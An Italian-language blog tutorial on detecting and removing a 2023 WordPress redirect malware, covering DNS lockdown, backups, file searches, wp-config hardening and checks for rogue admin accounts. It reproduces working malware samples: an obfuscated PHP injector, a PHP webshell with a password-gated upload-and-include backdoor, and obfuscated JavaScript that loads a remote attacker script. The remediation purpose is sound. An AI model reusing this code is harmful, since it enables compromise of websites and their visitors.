Fix Redirect WordPress Hack 2023 (Virus di reindirizzamento)

0

WordPress è sicuramente la piattaforma più utilizzata CMS (Content Management System) sia per i blog che per i negozi online di avviamento (con il modulo WooCommerce), che lo rende il più preso di mira dagli attacchi informatici (hacking). Una delle operazioni di hacking più utilizzate mira a reindirizzare il sito Web compromesso ad altre pagine Web. Redirect WordPress Hack 2023 è un malware relativamente nuovo che ha l'effetto di reindirizzare l'intero sito a pagine Web di spam o che a sua volta può infettare i computer degli utenti.

Se il tuo sito è stato sviluppato su WordPress viene reindirizzato su un altro sito, allora è molto probabile che sia vittima del già famoso hack di reindirizzamento.

In questo tutorial troverai le informazioni necessarie e suggerimenti utili con cui puoi de-virusare un sito Web infetto da un reindirizzamento WordPress Hack (Virus Redirect). Attraverso i commenti è possibile ottenere informazioni aggiuntive o chiedere aiuto.

Rilevamento del virus che reindirizza i siti WordPress

Un calo improvviso e ingiustificato del traffico del sito web, una diminuzione del numero di ordini (nel caso dei negozi online) o degli introiti pubblicitari sono i primi segnali che qualcosa non va. Rilevamento "Redirect WordPress Hack 2023” (Virus Redirect) può essere eseguito anche “visivamente” quando si apre il sito Web e si viene reindirizzati a un'altra pagina Web.

Per esperienza, la maggior parte dei malware Web è compatibile con i browser Internet: Chrome, Firefox, Edge, Opera. Se sei un utente di computer Mac, questi virus non sono realmente visibili nel browser Safari. Sistema di sicurezza da Safari bloccare silenziosamente questi script dannosi.

Cosa fare se si dispone di un sito Web infetto da Redirect WordPress Hack

Spero che il primo passo sia non farsi prendere dal panico o eliminare il sito web. Anche i file infetti o virus non dovrebbero essere eliminati all'inizio. Contengono informazioni preziose che possono aiutarti a capire dove si trova la violazione della sicurezza e cosa ha colpito il virus. Modus operandi.

Chiudere il sito web al pubblico.

Come si chiude un sito Web di virus ai visitatori? Il più semplice è utilizzare il gestore DNS ed eliminare l'IP per "A" (il nome di dominio) o definire un IP inesistente. Pertanto, i visitatori del sito Web saranno protetti da questo redirect WordPress hack che può portarli a pagine Web di virus o SPAM.

Se usi CloudFlare come gestore DNS, accedi all'account ed elimini i record DNS "A” per il nome di dominio. Pertanto, il dominio colpito dal virus rimarrà senza IP, non potendo più accedervi da Internet.

Copia l'IP del sito Web e lo "instrada" in modo che solo tu possa accedervi. Dal tuo computer.

Come modificare l'IP reale di un sito Web sui computer Windows?

Il metodo viene spesso utilizzato per bloccare l'accesso a determinati siti Web modificando il file "hosts".

1. Apri Notepad o altro editor di testo (con diritti administrator) e modifica il file "hosts". É situato in: 

C:\Windows\System32\drivers\etc\hosts

2. Nel file "hosts", aggiungi "route" all'IP reale del tuo sito web. IP cancellato sopra dal gestore DNS. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Salvare il file e accedere al sito Web nel browser.

Se il sito Web non si apre e non hai fatto nulla di sbagliato nel file "hosts", è molto probabile che si tratti di una cache DNS.

Per cancellare la cache DNS su un sistema operativo Windows, aprire Command Prompt, dove esegui il comando: 

ipconfig /flushdns

Come modificare l'IP reale di un sito Web sui computer Mac / MacLibro?

Per gli utenti di computer Mac è in qualche modo più semplice cambiare l'IP reale di un sito web.

1. Aprire l'utilità Terminal.

2. Eseguire la riga di comando (richiede la password di sistema per l'esecuzione): 

sudo nano /etc/hosts

3. Come per i computer Windows, aggiungi l'IP reale del dominio. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Salva le modifiche. Ctrl+X (y).

Dopo aver "instradato", sei l'unica persona che può accedere al sito Web infetto con Redirect WordPress Hack.

Backup completo del sito Web: file e database

Anche se è infetto da "redirect WordPress hack”, la raccomandazione è di fare un backup generale dell'intero sito web. File e database. Forse potresti anche salvare una copia locale di entrambi i file da public / public_html così come la banca dati.

Identificazione dei file infetti e di quelli modificati da Redirect WordPress Hack 2023

I principali file di destinazione del file WordPress esistono index.php (nella radice), header.php, index.php şi footer.php del tema WordPress risorse. Controlla manualmente questi file e identifica il codice dannoso o uno script malware.

Nel 2023, un virus del “Redirect WordPress Hack" mettere in index.php un codice della forma:

(Non consiglio di eseguire questi codici!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Decodificato, questo script dannoso è fondamentalmente la conseguenza dell'infezione del sito web WordPress. Non è lo script dietro il malware, è lo script che rende possibile reindirizzare la pagina web infetta. Se decodifichiamo lo script sopra, otteniamo: 

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Fix Redirect WordPress Hack 2023
Fix Redirect WordPress Hack 2023

Per identificare tutti i file sul server che contengono questo codice, è bene avere accesso SSH al server per eseguire il controllo dei file e le righe di comando di gestione Linux.

Correlato: Come scoprire se il tuo blog è infetto o meno, con l'aiuto Google Search . (WordPress Virus)

Di seguito sono riportati due comandi che sono sicuramente utili per identificare file modificati di recente e file che contengono un determinato codice (stringa).

Come vedi su Linux File PHP modificati nelle ultime 24 ore o in qualche altro periodo di tempo?

Ordine "find” è molto semplice da usare e consente la personalizzazione per impostare il periodo di tempo, il percorso di ricerca e il tipo di file. 

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Nell'output riceverai informazioni sulla data e l'ora in cui il file è stato modificato, i permessi di scrittura / lettura / esecuzione (chmod) e a quale gruppo/utente appartiene.

Se vuoi controllare più giorni fa, cambia il valore "-mtime -1"o usa"-mmin -360” per minuti (6 ore).

Come cercare un codice (stringa) all'interno di PHP, file Java?

La riga di comando "trova" che permette di trovare velocemente tutti i file PHP o Java che contengono un certo codice è la seguente: 

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Il comando cercherà e visualizzerà i file .php şi .js contenente "uJjBRODYsU".

Con l'aiuto dei due comandi precedenti scoprirai molto facilmente quali file sono stati modificati di recente e quali contengono codice malware.

Rimuove il codice dannoso dai file modificati senza compromettere il codice corretto. Nel mio scenario, il malware è stato posizionato prima dell'apertura <head>.

Quando si esegue il primo comando "trova", è molto possibile scoprire nuovi file sul server, che non sono tuoi WordPress né messo lì da te. File appartenenti al tipo di virus Redirect WordPress Hack.

Nello scenario che ho esaminato, i file del modulo "wp-log-nOXdgD.php". Si tratta di file "spawn" che contengono anche codice malware utilizzato dal virus per il reindirizzamento. 

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Lo scopo dei file di tipo "wp-log-*” è quello di diffondere il virus di hacking di reindirizzamento ad altri siti Web ospitati sul server. È un codice malware del tipo “webshell” composto da a sezione di base (in cui sono definite alcune variabili cifrate) e o sezione di esecuzione attraverso il quale l'attaccante tenta di caricare ed eseguire un codice dannoso sul sistema.

Se c'è una variabile POST di nome 'bh' e il suo valore crittografato MD5 è uguale a "8f1f964a4b4d8d1ac3f0386693d28d03", quindi lo script sembra scrivere il contenuto crittografato base64 di un'altra variabile chiamata 'b3' in un file temporaneo e quindi tenta di includere questo file temporaneo.

Se c'è una variabile POST o GET di nome 'tick', lo script risponderà con il valore MD5 della corda"885".

Per identificare tutti i file sul server che contengono questo codice, scegli una stringa comune, quindi esegui il comando "find” (simile a quello sopra). Elimina tutti i file contenenti questo codice malware.

Falla di sicurezza sfruttata da Redirect WordPress Hack

Molto probabilmente questo virus di reindirizzamento arriva tramite sfruttamento dell'utente amministratore WordPress o identificando a plugin vulnerabile che consente di aggiungere utenti con privilegi di administrator.

Per la maggior parte dei siti web costruiti sulla piattaforma WordPress è possibile modifica di temi o file di plug-indall'interfaccia di amministrazione (Dashboard). Pertanto, una persona malintenzionata può aggiungere codice malware ai file del tema per generare gli script mostrati sopra.

Un esempio di tale codice malware è questo: 

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificato nell'intestazione del tema WordPress, subito dopo l'apertura dell'etichetta <head>.

È abbastanza difficile decifrare questo JavaScript, ma è ovvio che interroga un altro indirizzo web da dove molto probabilmente recupera altri script per creare i file "wp-log-*” di cui ho parlato sopra.

Trova ed elimina questo codice da tutti i file PHP ricercato.

Per quanto ne so, questo codice era aggiunto manualmente da un nuovo utente con privilegi amministrativi.

Quindi, per impedire l'aggiunta di malware dalla Dashboard, è meglio disabilitare l'opzione di modifica WordPress Temi / Plugin dalla Dashboard.

Modifica il file wp-config.php e aggiungi le righe: 

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Dopo aver apportato questa modifica, nessun utente WordPress non sarai più in grado di modificare i file dalla Dashboard.

Controlla gli utenti con ruolo di Administrator

Di seguito è riportata una query SQL che puoi utilizzare per cercare utenti con il ruolo di administrator nella piattaforma WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Questa query restituirà tutti gli utenti nella tabella wp_users che ha assegnato il ruolo di administrator. La query viene eseguita anche per la tabella wp_usermeta cercare in meta'wp_capabilities', che contiene informazioni sui ruoli utente.

Un altro metodo è identificarli da: Dashboard → Users → All Users → Administrator. Tuttavia, esistono pratiche in base alle quali un utente può essere nascosto nel pannello Dashboard. Quindi, il modo migliore per vedere gli utenti "Administrator"In WordPress è il comando SQL sopra.

Nel mio caso, ho identificato nel database l'utente con il nome "wp-import-user". Abbastanza suggestivo.

Malware WP utente non valido
Malware WP utente non valido

Anche da qui puoi vedere la data e l'ora dell'utente WordPress è stata creata. Anche l'ID utente è molto importante perché cerca nei log del server. In questo modo puoi vedere tutte le attività di questo utente.

Elimina utenti con ruolo di administrator che non sai, allora cambiare password a tutti gli utenti amministrativi. Editore, Autore, Administrator.

Modificare la password dell'utente del database SQL del sito Web interessato.

Dopo aver eseguito questi passaggi, il sito Web può essere riavviato per tutti gli utenti.

Tieni presente, tuttavia, che quello che ho presentato sopra è uno dei forse migliaia di scenari in cui un sito Web è stato infettato Redirect WordPress Hack nel 2023.

Se il tuo sito web è stato infettato e hai bisogno di aiuto o se hai domande, la sezione dei commenti è aperta.

Appassionato di tecnologia, scrivo con piacere su StealthSettings.com dal 2006. Ho un'ampia esperienza nei sistemi operativi: macOS, Windows e Linux, nonché nei linguaggi di programmazione e nelle piattaforme di blogging (WordPress) e per i negozi online (WooCommerce, Magento, PrestaShop).

Tutorial scritti da me.
AntiVirus e sicurezza Linux Tech Notizie Tutorial e notizie IT WordPress
Malware virus wordpress WordPress Hacks WordPress virus
Come » WordPress » Fix Redirect WordPress Hack 2023 (Virus di reindirizzamento)

Come bloccare automaticamente il tuo computer quando ti allontani da esso

Come sbloccare il tuo Mac usando l'Apple Watch

Lascia un tuo commento

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows vista

Windows XP

Gestione attività

Tutorial

Microsoft 365 / Office

Microsoft 365 / Office

Excel

Word

PowerPoint

Outlook

Office 365 Productivity

Linux e software web

Nginx

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

web hosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. Tutorial e novità sull'informatica.

Politica sulla privacy | Informazioni sui cookie | Contatti | Riguardo a noi